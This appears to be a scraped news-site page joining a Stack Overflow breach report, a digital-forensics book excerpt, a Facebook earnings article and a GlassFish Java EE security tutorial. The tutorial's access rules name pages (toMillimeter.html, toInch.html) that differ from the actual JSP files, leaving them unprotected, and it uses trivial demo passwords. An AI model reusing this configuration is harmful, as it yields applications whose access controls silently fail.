Almost after a week of the attack, Stack Overflow admitted in an official security update yesterday, that their production systems has been hacked. “Over the weekend, there was an attack on Stack Overflow. We have confirmed that some level of production access was gained on May 11”, said Mary Ferguson ,VP of Engineering at Stack Overflow. In this short update, the company has mentioned that they are investigating the extent of the access and are addressing all the known vulnerabilities. Though not confirmed, the company has identified no breach of customer or user data. https://twitter.com/gcluley/status/1129260135778607104 Some users are acknowledging the fact that that the firm has at least come forward and accepted the security violation. A user on Reddit said, “Wow. I'm glad they're letting us know early, but this sucks” There are other users who think that security breach due to hacking is very common nowadays. A user on Hacker News commented, “I think we've reached a point where it's safe to say that if you're using a service -any service - assume your data is breached (or willingly given) and accessible to some unknown third party. That third party can be the government, it can be some random marketer or it can be a malicious hacker. Just hope that you have nothing anywhere that may be of interest or value to anyone, anywhere. Good luck.” Few days ago, there were reports that Stack Overflow directly links to Facebook profile pictures. This means that the linking unintentionally allows user activity throughout Stack Exchange to be tracked by Facebook and also tracks the topics that the users are interested in. Read More: Facebook again, caught tracking Stack Overflow user activity and data Stack Overflow has also assured users that more information will be provided to them, once the company concludes the investigation. Stack Overflow survey data further confirms Python’s popularity as it moves above Java in the most used programming language list 2019 Stack Overflow survey: A quick overview Stack Overflow is looking for a new CEO as Joel Spolsky becomes Chairman
Read more
  • 0
  • 0
  • 2722

article-image-selecting-and-analyzing-digital-evidence
Packt
08 Apr 2016
13 min read
Save for later

Selecting and Analyzing Digital Evidence

Packt
08 Apr 2016
13 min read
In this article, Richard Boddington, the author of Practical Digital Forensics, explains how the recovery and preservation of digital evidence has traditionally involved imaging devices and storing the data in bulk in a forensic file or, more effectively, in a forensic image container, notably the IlookIX .ASB container. The recovery of smaller, more manageable datasets from larger datasets from a device or network system using the ISeekDiscovery automaton is now a reality. Whether the practitioner examines an image container or an extraction of information in the ISeekDiscovery container, it should be possible to overview the recovered information and develop a clearer perception of the type of evidence that should be located. Once acquired, the image or device may be searched to find evidence, and locating evidence requires a degree of analysis combined with practitioner knowledge and experience. The process of selection involves analysis, and as new leads open up, the search for more evidence intensifies until ultimately, a thorough search is completed. The searching process involves the analysis of possible evidence, from which evidence may be discarded, collected, or tagged for later reexamination, thereby instigating the selection process. The final two stages of the investigative process are the validation of the evidence, aimed at determining its reliability, relevance, authenticity, accuracy, and completeness, and finally, the presentation of the evidence to interested parties, such as the investigators, the legal team, and ultimately, the legal adjudicating body. (For more resources related to this topic, see here.) Locating digital evidence Locating evidence from the all-too-common large dataset requires some filtration of extraneous material, which has, until recently, been a mainly manual task of sorting the wheat from the chaff. But it is important to clear the clutter and noise of busy operating systems and applications from which only a small amount of evidence really needs to be gleaned. Search processes involve searching in a file system and inside files, and common searches for files are based on names or patterns in their names, keywords in their content, and temporal data (metadata) such as the last access or written time. A pragmatic approach to the examination is necessary, where the onus is on the practitioner to create a list of key words or search terms to cull specific, probative, and case-related information from very large groups of files. Searching desktops and laptops Home computer networks are normally linked to the Internet via a modem and various peripheral devices: a scanner, printer, external hard drive, thumb drive storage device, a digital camera, a mobile phone and a range of users. In an office network this would be a more complicated network system. The linked connections between the devices and the Internet with the terminal leave a range of traces and logging records in the terminal and on some of the devices and the Internet. E-mail messages will be recorded externally on the e-mail server, the printer may keep a record of print jobs, the external storage devices and the communication media also leave logs and data linked to the terminal. All of this data may assist in the reconstruction of key events and provide evidence related to the investigation. Using the logical examination process (booting up the image) it is possible to recover a limited number of deleted files and reconstruct some of the key events of relevance to an investigation. It may not always be possible to boot up a forensic image and view it in its logical format, which is easier and more familiar to users. However, viewing the data inside a forensic image in it physical format provides unaltered metadata and a greater number of deleted, hidden and obscured files that provide accurate information about applications and files. It is possible to view the containers that hold these histories and search records that have been recovered and stored in a forensic file container. Selecting digital evidence For those unfamiliar with investigations, it is quite common to misread the readily available evidence and draw incorrect conclusions. Business managers attempting to analyze what they consider are the facts of a case would be wise to seek legal assistance in selecting and evaluating evidence on which they may wish to base a case. Selecting the evidence involves analysis of the located evidence to determine what events occurred in the system, their significance, and the probative value to the case. The selection analysis stage requires the practitioner to carefully examine the available digital evidence ensuring that they do not misinterpret the evidence and make imprudent presumptions without carefully cross-checking the information. It is a fact-finding process where an attempt is made to develop a plausible reconstruction of the facts. As in conventional crime investigations, practitioners should look for evidence that suggests or indicates motive (why?), means (how?) and opportunity (when?) for suspects to commit the crime, but in cases dependent on digital evidence, it can be a vexatious process. There are often too many potential suspects, which complicates the process of linking the suspect to the events. The following figure shows a typical family network setup using Wi-Fi connections to the home modem that facilitates connection to the Internet. In this case, the parents provided the broadband service for themselves and for three other family members. One of the children's girlfriend completed her university assignments on his computer and synchronized her iPad to his device. The complexity of a typical household network and determining the identity of the transgressor The complexity of a typical household network and determining the identity of the transgressor More effective forensic tools Various forensic tools are available to assist the practitioner in selecting and collating data for examination analysis and investigation. Sorting order from the chaos of even a small personal computer can be a time-consuming and frustrating process. As the digital forensic discipline develops, better and more reliable forensic tools have been developed to assist practitioners in locating, selecting, and collating evidence from larger, complex datasets. To varying degrees, most digital forensic tools used to view and analyze forensic images or attached devices provide helpful user interfaces for locating and categorizing information relevant to the examination. The most advanced application that provides access and convenient viewing of files is the Category Explorer feature in ILookIX, which divides files by type, signature, and properties. Category Explorer also allows the practitioner to create custom categories to group files by relevance. For example, in a criminal investigation involving a conspiracy, the practitioner could create a category for the first individual and a category for the second individual. As files are reviewed, they would then be added to either or both categories. Unlike tags, files can be added to multiple categories, and the categories can be given descriptive names. Deconstructing files The deconstruction of files involves processing compound files such as archives, e-mail stores, registry stores, or other files to extract useful and usable data from a complex file format and generate reports. Manual deconstruction adds significantly to the time taken to complete an examination. Deconstructable files are compound files that can be further broken down into smaller parts such as e-mails, archives, or thumb stores of JPG files. Once the deconstruction is completed, the files will either move into the deconstructed files or deconstruction failed files folders. Deconstructable files will now be now broken out more—e-mail, graphics, archives, and so on. Searching for files Indexing is the process of generating a table of text strings that can then be searched almost instantly any number of times. The two main uses of indexing are to create a dictionary to use when cracking passwords and to index the words for almost-instant searching. Indexing is also valuable when creating a dictionary or using any of the analysis functions built in to ILookIX. ILookIX facilitates the indexing of the entire media at the time of initial processing, all at once. This can also be done after processing. Indexing facilitates searching through files and archives, Windows Registry, e-mail lists, and unallocated space. This function is highly customizable via the setup option in order to optimize for searching or for creating a custom dictionary for password cracking. Sound indexing ensures speedy and accurate searching. Searching is the process of having ILookIX look through the evidence for a specific item, such as a string of text or an expression. An expression, in terms of searching, is a pattern used to structure data in a search, such as a credit card number or e-mail address. The Event Analysis tool ILookIX's Event Analysis tool provides the practitioner a graphical representation of events on the subject system, such as file creation, access, or modification; e-mails sent or received; and other events such as the modification of the Master File Table on an NTFS system. The application allows the practitioner to zoom in on any point on the graph to view more specific details. Clicking on any bar on the graph will return the view to the main ILookIX window and display the items from the date bar selected in the List Pane. This can be most helpful when analyzing events during specific periods. The Lead Analysis tool Lead Analysis is an interactive evidence model embedded in ILookIX that allows the practitioner to assimilate known facts into a graphic representation that directly links unseen objects. It provides the answers as the practitioner increases the detail of the design surface and brings into view specific relationships that could go unseen otherwise. The primary aim of Lead Analysis is to help discover links within the case data that may not be evident or intuitive and the practitioner may not be aware of directly or that the practitioner has little background knowledge of to help form relationships manually. Instead of finding and making note of various pieces of information, the analysis is presented as an easy-to-use link model. The complexity of the modeling is removed so that it gives the clearest possible method of discovery. The analysis is based on the current index database, so it is essential to index case data prior to initiating an analysis. Once a list of potential links has been generated, it is important to review them to see whether any are potentially relevant. Highlight any that are, and it will then be possible to look for words in the catalogues if they have been included. In the example scenario, the word divorce was located as it was known that Sarah was divorced from the owner of the computer (the initial suspect). By selecting any word by left-clicking on it once and clicking on the green arrow to link it to Sarah, as shown below, relationships can be uncovered that are not always clear during the first inspection of the data. Each of the stated facts becomes one starting lead on the canvas. If the nodes are related, it is easy to model that relationship by manually linking them together by selecting the first Lead Project to link, right-clicking, and selecting Add a New Port from the menu. This is then repeated for the second Lead Object the practitioner wants to link. By simply clicking on the new port of the selected object that needs to be linked from and dragging to the port of the Lead Object that it should be linked to, a line will appear linking the two together. It is then possible to iterate this process using each start node or discovered node until it is possible to make sense of the total case data. A simple relationship between suspects, locations and even concepts is illustrated in the following screenshot: ILookIX Lead Analysis discovering relationships between various entities ILookIX Lead Analysis discovering relationships between various entities Analyzing e-mail datasets Analyzing and selecting evidence from large e-mail datasets is a common task for the practitioner. ILookIX's embedded application E-mail Linkage Analysis is an interactive evidence model to help practitioners discover links between the correspondents within e-mail data. The analysis is presented as an easy-to-use link model; the complexity of the modeling is removed to provide the clearest possible method of discovery. The results of analysis are saved at the end of the modeling session for future editing. If there is a large amount of e-mail to process, this analysis generation may take a few minutes. Once the analysis is displayed, the user will see the e-mail linkage itself. It is then possible to see a line between correspondents indicating that they have a relationship of some type. Here in particular, line thickness indicates the frequency of traffic between two correspondents; therefore, thicker flow lines indicate more traffic. On the canvas, once the analysis is generated, the user may select any e-mail addressee node by left-clicking on it once. Creating the analysis is really simple, and one of the most immediately valuable resources this provides is group identification, as shown in the following screenshot. ILookIX will initiate a search for that addressee and list all e-mails where your selected addressee was a correspondent. Users may make their own connection lines by clicking on an addressee node point and dragging to another node point. Nodes can be deleted to allow linkage between smaller groups of individuals. The E-mail Linkage tool showing relationships of possible relevance to a case The E-mail Linkage tool showing relationships of possible relevance to a case The Volume Shadow Copy analysis tools Shadow volumes, also known as the Volume Snapshot Service (VSS), use a service that creates point-in-time copies of files. The service is built in to versions of Windows Vista, 7, 8, and 10 and is turned on by default. ILookIX can recover true copies of overwritten files from shadow volumes, as long as they resided on the volume at the time that the snapshot was created. VSS recovery is a method of recovering extant and deleted files from the volume snapshots available on the system. IlookIX, unlike any other forensic tool, is capable of reconstructing volume shadow copies, either differential or full, including deleted files and folders. In the test scenario, the tool recovered a total of 87,000 files, equating to conventional tool recovery rates. Using ILookIX's Xtreme File Recovery, some 337,000 files were recovered. The Maximal Full Volume Shadow Snapshot application recovered a total of 797,00 files. Using the differential process, 354,000 files were recovered, which filtered out 17,000 additional files for further analysis. This enabled the detection of e-mail messages and attachments and Windows Registry changes that would normally remain hidden. Summary This article described in detail the process of locating and selecting evidence in terms of a general process. It also further explained the nature of digital evidence and provided examples of its value in supporting a legal case. Various advanced analysis and recovery tools were demonstrated that show the reader how technology can speed up and make more efficient the location and selection processes. Some of these tools are not new but have been enhanced, while others are innovative and seek out evidence normally unavailable to the practitioner. Resources for Article: Further resources on this subject: Mobile Phone Forensics – A First Step into Android Forensics [article] Introduction to Mobile Forensics [article] BackTrack Forensics [article]
Read more
  • 0
  • 0
  • 2710
article-image-why-wall-street-unfriended-facebook-stocks-lost-over-120-billion-in-market-value-after-q2-2018-earnings-call
Natasha Mathur
27 Jul 2018
6 min read
Save for later

Why Wall Street unfriended Facebook: Stocks fell $120 billion in market value after Q2 2018 earnings call

Natasha Mathur
27 Jul 2018
6 min read
After been found guilty of providing discriminatory advertisements on its platform earlier this week, Facebook hit yet another wall yesterday as its stock closed falling down by 18.96% on Thursday with shares selling at $176.26. This means that the company lost around $120 billion in market value overnight, making it the largest loss of value ever in a day for a US-traded company since Intel Corp’s two-decade-old crash. Intel had lost a little over $18 billion in one day, 18 years back. Despite the 41.24% revenue growth compared to last year, this was Facebook’s biggest stock market drop ever. Here’s the stock chart from NASDAQ showing the figures:   Facebook’s market capitalization was worth $629.6 on Wednesday. As soon as Facebook’s Earnings calls concluded by the end of market trading on Thursday, it’s worth dropped to $510 billion after the close. Also, as Facebook’s market shares continued to drop down during Thursday’s market, it left its CEO, Mark Zuckerberg with less than $70 billion, wiping out nearly $17 billion of his personal stake, according to Bloomberg. Also, he was demoted from the third to the sixth position on Bloomberg’s Billionaires Index. Active user growth starting to stagnate in mature markets According to David Wehner, CFO at Facebook, “the Daily active users count on Facebook reached 1.47 billion, up 11% compared to last year, led by growth in India, Indonesia, and the Philippines. This number represents approximately 66% of the 2.23 billion monthly active users in Q2”. Facebook’s daily active users He also mentioned that  “MAUs (monthly active users) were up 228M or 11% compared to last year. It is worth noting that MAU and DAU in Europe were both down slightly quarter-over-quarter due to the GDPR rollout, consistent with the outlook we gave on the Q1 call”. Facebook’s Monthly Active users In fact, Facebook has implemented several privacy policy changes in the last few months. This is due to the European Union's General Data Protection Regulation ( GDPR ) as the company's earnings report revealed the effects of the GDPR rules. Revenue Growth Rate is falling too Speaking of revenue expectations, Wehner gave investors a heads up that revenue growth rates will decline in the third and fourth quarters. Wehner states that the company’s “total revenue growth rate decelerated approximately 7 percentage points in Q2 compared to Q1. Our total revenue growth rates will continue to decelerate in the second half of 2018, and we expect our revenue growth rates to decline by high single-digit percentages from prior quarters sequentially in both Q3 and Q4.”  Facebook reiterated further that these numbers won’t get better anytime soon.                                                 Facebook’s Q2 2018 revenue Wehner further spoke explained the reasons for the decline in revenue,“There are several factors contributing to that deceleration..we expect the currency to be a slight headwind in the second half ...we plan to grow and promote certain engaging experiences like Stories that currently have lower levels of monetization. We are also giving people who use our services more choices around data privacy which may have an impact on our revenue growth”. Let’s look at other performance indicators Other financial highlights of Q2 2018 are as follows: Mobile advertising revenue represented 91% of advertising revenue for q2 2018, which is up from approx. 87% of the advertising revenue in Q2 2017. Capital expenditures for Q2 2018 were $3.46 billion which is up from $1.4 billion in Q2 2017. Headcount was 30,275 around June 30, which is an increase of 47% year-over-year. Cash, Cash equivalents, and marketable securities were $42.3 billion at the end of Q2 2018, an increase from $35.45 billion at the end of the Q2 2017. Wehner also mentioned that the company “continue to expect that full-year 2018 total expenses will grow in the range of 50-60% compared to last year. In addition to increases in core product development and infrastructure -- growth is driven by increasing investments -- safety & security, AR/VR, marketing, and content acquisition”. Another reason for the overall loss is that Facebook has been dealing with criticism for quite some time now over its content policies, its issues regarding user’s private data and its changing rules for advertisers. In fact, it is currently investigating data analytics firm Crimson Hexagon over misuse of data. Mark Zuckerberg also said over a conference call with financial analysts that Facebook has been investing heavily in “safety, security, and privacy” and that how they’re “investing - in security that it will start to impact our profitability, we’re starting to see that this quarter - we run this company for the long term, not for the next quarter”. Here’s what the public feels about the recent wipe-out: https://twitter.com/TeaPainUSA/status/1022586648155054081 https://twitter.com/alistairmilne/status/1022550933014753280 So, why did Facebook’s stocks crash? As we can see, Facebook’s performance itself in Q2 2018 has been better than its performance last year for the same quarter as far as revenue goes. Ironically, scandals and lawsuits have had little impact on Facebook’s growth. For example, Facebook recovered from the Cambridge Analytica scandal fully within two months as far share prices are concerned. The Mueller indictment report released earlier this month managed to arrest growth for merely a couple of days before the company bounced back. The discriminatory advertising verdict against Facebook, had no impact on its bullish growth earlier this week. This brings us to conclude that the public sentiments and market reactions against Facebook have very different underlying reasons. The market’s strong reactions are mainly due to concerns over the active user growth slowdown, the lack of monetization opportunities on the more popular Instagram platform, and Facebook’s perceived lack of ability to evolve successfully to new political and regulatory policies such as the GDPR. Wall Street has been indifferent to Facebook’s long list of scandals, in some ways, enabling the company’s ‘move fast and break things’ approach. In his earnings call on Thursday, Zuckerberg hinted that Facebook may not be keen on ‘growth at all costs’ by saying things like “we’re investing so much in security that it will significantly impact our profitability” and then Wehner adding, “Looking beyond 2018, we anticipate that total expense growth will exceed revenue growth in 2019.” And that has got Wall street unfriending Facebook with just a click of the button! Is Facebook planning to spy on you through your mobile’s microphones? Facebook to launch AR ads on its news feed to let you try on products virtually Decoding the reasons behind Alphabet’s record high earnings in Q2 2018  
Read more
  • 0
  • 0
  • 2672

article-image-developing-secure-java-ee-applications-glassfish
Packt
31 May 2010
14 min read
Save for later

Developing Secure Java EE Applications in GlassFish

Packt
31 May 2010
14 min read
In this article series, we will develop a secure Java EE application based on Java EE and GlassFish capabilities. In course of the article, we will cover following topics: Analyzing Java EE application security requirements Including security requirements in Java EE application design Developing secure Business layer using EJBs Developing secure Presentation layer using JSP and Servlets Configuring deployment descriptors of Java EE applications Specifying security realm for enterprise applications Developing secure application client module Configuring Application Client Container Read Designing Secure Java EE Applications in GlassFish here. Developing the Presentation layer The Presentation layer is the closest layer to end users when we are developing applications that are meant to be used by humans instead of other applications. In our application, the Presentation layer is a Java EE web application consisting of the elements listed in the following table. In the table you can see that different JSP files are categorized into different directories to make the security description easier. Element Name Element Description Index.jsp Application entry point. It has some links to functional JSP pages like toMilli.jsp and so on. auth/login.html This file presents a custom login page to user when they try to access a restricted resource. This file is placed inside auth directory of the web application. auth/logout.jsp Logging users out of the system after their work is finished. auth/loginError.html Unsuccessful login attempt redirect users to this page. This file is placed inside auth directory of the web application jsp/toInch.jsp Converts given length to inch, it is only available for managers. jsp/toMilli.jsp Converts given length to millimeter, this page is available to any employee. jsp/toCenti.jsp Converts given length to centimeter, this functionality is available for everyone. Converter Servlet Receives the request and invoke the session bean to perform the conversion and returns back the value to user. auth/accessRestricted.html An error page for error 401 which happens when authorization fails. Deployment Descriptors The deployment descriptors which we describe the security constraints over resources we want to protect. Now that our application building blocks are identified we can start implementing them to complete the application. Before anything else let's implement JSP files that provides the conversion GUI. The directory layout and content of the Web module is shown in the following figure: Implementing the Conversion GUI In our application we have an index.jsp file that acts as a gateway to the entire system and is shown in the following listing: <html> <head><title>Select A conversion</title></head> <body><h1>Select A conversion</h1> <a href="auth/login.html">Login</a> <br/> <a href="jsp/toCenti.jsp">Convert Meter to Centimeter</a> <br/> <a href="jsp/toInch.jsp">Convert Meter to Inch</a> <br/> <a href="jsp/toMilli.jsp">Convert to Millimeter</a><br/> <a href="auth/logout.jsp">Logout</a> </body> </html> Implementing the Converter servlet The Converter servlet receives the conversion value and method from JSP files and calls the corresponding method of a session bean to perform the actual conversion. The following listing shows the Converter servlet content: @WebServlet(name="Converter", urlPatterns={"/Converter"}) public class Converter extends HttpServlet { @EJB private ConversionLocal conversionBean; protected void processRequest(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException { } @Override protected void doPost(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException { System.out.println("POST"); response.setContentType("text/html;charset=UTF-8"); PrintWriter out = response.getWriter(); try{ int valueToconvert = Integer.parseInt(request.getParameter("meterValue")); String method = request.getParameter("method"); out.print("<hr/> <center><h2>Conversion Result is: "); if (method.equalsIgnoreCase("toMilli")) { out.print(conversionBean.toMilimeter(valueToconvert)); } else if (method.equalsIgnoreCase("toCenti")) { out.print(conversionBean.toCentimeter(valueToconvert)); } else if (method.equalsIgnoreCase("toInch")) { out.print(conversionBean.toInch(valueToconvert)); } out.print("</h2></center>"); }catch (AccessLocalException ale) { response.sendError(401); }finally { out.close(); } } } Starting from the beginning we are using annotation to configure the servlet mapping and servlet name instead of using the deployment descriptor for it. Then we use dependency injection to inject an instance of Conversion session bean into the servlet and decide which one of its methods we should invoke based on the conversion type that the caller JSP sends as a parameter. Finally, we catch javax.ejb.AccessLocalException and send an HTTP 401 error back to inform the client that it does not have the required privileges to perform the requested action. The following figure shows what the result of invocation could look like: Each servlet needs some description elements in the deployment descriptor or included as deployment descriptor elements. Implementing the conversion JSP files is the last step in implementing the functional pieces. In the following listing you can see content of the toMilli.jsp file. <html> <head><title>Convert To Millimeter</title></head> <body><h1>Convert To Millimeter</h1> <form method=POST action="../Converter">Enter Value to Convert: <input name=meterValue> <input type="hidden" name="method" value="toMilli"> <input type="submit" value="Submit" /> </form> </body> </html> The toCenti.jsp and toInch.jsp files look the same except for the descriptive content and the value of the hidden parameter which will be toCenti and toInch respectively for toCenti.jsp and toInch.jsp. Now we are finished with the functional parts of the Web layer; we just need to implement the required GUI for security measures. Implementing the authentication frontend For the authentication, we should use a custom login page to have a unified look and feel in the entire web frontend of our application. We can use a custom login page with the FORM authentication method. To implement the FORM authentication method we need to implement a login page and an error page to redirect the users to that page in case authentication fails. Implementing authentication requires us to go through the following steps: Implementing login.html and loginError.html Including security description in the web.xml and sun-web.xml or sun-application.xml Implementing a login page In FORM authentication we implement our own login form to collect username and password and we then pass them to the container for authentication. We should let the container know which field is username and which field is password by using standard names for these fields. The username field is j_username and the password field is j_password. To pass these fields to container for authentication we should use j_security_check as the form action. When we are posting to j_security_check the servlet container takes action and authenticates the included j_username and j_password against the configured realm. The listing below shows login.html content. <form method="POST" action="j_security_check"> Username: <input type="text" name="j_username"><br /> Password: <input type="password" name="j_password"><br /> <br /> <input type="submit" value="Login"> <input type="reset" value="Reset"> </form> The following figure shows the login page which is shown when an unauthenticated user tries to access a restricted resource: Implementing a logout page A user may need to log out of our system after they're finished using it. So we need to implement a logout page. The following listing shows the logout.jsp file: <% session.invalidate(); %> <body> <center> <h1>Logout</h1> You have successfully logged out. </center> </body> Implementing a login error page And now we should implement LoginError.html, an authentication error page to inform user about its authentication failure. <html> <body> <h2>A Login Error Occurred</h2> Please click <a href="login.html">here</a> for another try. </body> </html> Implementing an access restricted page When an authenticated user with no required privileges tries to invoke a session bean method, the EJB container throws a javax.ejb.AccessLocalException. To show a meaningful error page to our users we should either map this exception to an error page or we should catch the exception, log the event for audition purposes, and then use the sendError() method of the HttpServletResponse object to send out an error code. We will map the HTTP error code to our custom web pages with meaningful descriptions using the web.xml deployment descriptor. You will see which configuration elements we will use to do the mapping. The following snippet shows AccessRestricted.html file: <body> <center> <p>You need to login to access the requested resource. To login go to <a href="auth/login.html">Login Page</a></p></center> </body> Configuring deployment descriptors So far we have implemented required files for the FORM-based authentication and we only need to include required descriptions in the web.xml file. Looking back at the application requirement definitions, we see that anyone can use meter to centimeter conversion functionality and any other functionality that requires the user to login. We use three different HTML pages for different types of conversion. We do not need any constraint on toCentimeter.html therefore we do not need to include any definition for it. Per application description, any employee can access the toMilli.jsp page. Defining security constraint for this page is shown in the following listing: <security-constraint> <display-name>You should be an employee</display-name> <web-resource-collection> <web-resource-name>all</web-resource-name> <description/> <url-pattern>/jsp/toMillimeter.html</url-pattern> <http-method>GET</http-method> <http-method>POST</http-method> <http-method>DELETE</http-method> </web-resource-collection> <auth-constraint> <description/> <role-name>employee_role</role-name> </auth-constraint> </security-constraint> We should put enough constraints on the toInch.jsp page so that only managers can access the page. The listing included below shows the security constraint definition for this page. <security-constraint> <display-name>You should be a manager</display-name> <web-resource-collection> <web-resource-name>Inch</web-resource-name> <description/> <url-pattern>/jsp/toInch.html</url-pattern> <http-method>GET</http-method> <http-method>POST</http-method> </web-resource-collection> <auth-constraint> <description/> <role-name>manager_role</role-name> </auth-constraint> </security-constraint> Finally we need to define any role we used in the deployment descriptor. The following snippet shows how we define these roles in the web.xml page. <security-role> <description/> <role-name>manager_role</role-name> </security-role> <security-role> <description/> <role-name>employee_role</role-name> </security-role> Looking back at the application requirements, we need to define data constraint and ensure that username and passwords provided by our users are safe during transmission. The following listing shows how we can define the data constraint on the login.html page. <security-constraint> <display-name>Login page Protection</display-name> <web-resource-collection> <web-resource-name>Authentication</web-resource-name> <description/> <url-pattern>/auth/login.html</url-pattern> <http-method>GET</http-method> <http-method>POST</http-method> </web-resource-collection> <user-data-constraint> <description/> <transport-guarantee>CONFIDENTIAL</transport-guarantee> </user-data-constraint> </security-constraint> One more step and our web.xml file will be complete. In this step we define an error page for HTML 401 error code. This error code means that application server is unable to perform the requested action due to negative authorization result. The following snippet shows the required elements to define this error page. <error-page> <error-code>401</error-code> <location>AccessRestricted.html</location> </error-page> Now that we are finished with declaring the security we can create the conversion pages and after creating these pages we can start with Business layer and its security requirements. Specifying the security realm Up to this point we have defined all the constraints that our application requires but we still need to follow one more step to complete the application's security configuration. The last step is specifying the security realm and authentication. We should specify the FORM authentication and per-application description; authentication must happen against the company-wide LDAP server. Here we are going to use the LDAP security realm LDAPRealm. We need to import a new LDIF file into our LDAP server, which contains groups and users definition required for this article. To import the file we can use the following command, assuming that you downloaded the source code bundle from https://www.packtpub.com//sites/default/files/downloads/9386_Code.zip and you have it extracted. import-ldif --ldifFile path/to/chapter03/users.ldif --backendID userRoot --clearBackend --hostname 127.0.0.1 --port 4444 --bindDN cn=gf cn=admin --bindPassword admin --trustAll --noPropertiesFile The following table show users and groups that are defined inside the users.ldif file. Username and password Group membership james/james manager, employee meera/meera employee We used OpenDS for the realm data storage and it had two users, one in the employee group and the other one in the manager group. To configure the authentication realm we need to include the following snippet in the web.xml file. <login-config> <auth-method>FORM</auth-method> <realm-name>LDAPRealm</realm-name> <form-login-config> <form-login-page>/auth/login.html</form-login-page> <form-error-page>/auth/loginError.html</form-error-page> </form-login-config> </login-config> If we look at our Web and EJB modules as separate modules we must specify the role mappings for each module separately using the GlassFish deployment descriptors, which are sun-web.xml and sun-ejb.xml. But we are going to bundle our modules as an Enterprise Application Archive (EAR) file so we can use the GlassFish deployment descriptor for enterprise applications to define the role mapping in one place and let all modules use that definitions. The following listing shows roles and groups mapping in the sun-application.xml file. <sun-application> <security-role-mapping> <role-name>manager_role</role-name> <group-name>manager</group-name> </security-role-mapping> <security-role-mapping> <role-name>employee_role</role-name> <group-name>employee</group-name> </security-role-mapping> <realm>LDAPRealm</realm> </sun-application> The security-role-mapping element we used in sun-application.xml has the same schema as the security-role-mapping element of the sun-web.xml and sun-ejb-jar.xml files. You should have noticed that we have a realm element in addition to role mapping elements. We can use the realm element of the sun-application.xml to specify the default authentication realm for the entire application instead of specifying it for each module separately. Summary In this article series, we covered the following topics: Analyzing Java EE application security requirements Including security requirements in Java EE application design Developing secure Business layer using EJBs Developing secure Presentation layer using JSP and Servlets Configuring deployment descriptors of Java EE applications Specifying security realm for enterprise applications Developing secure application client module Configuring Application Client Container We learnt how to develop a secure Java EE application with all standard modules including Web, EJB, and application client modules.
Read more
  • 0
  • 0
  • 2671
Modal Close icon
Modal Close icon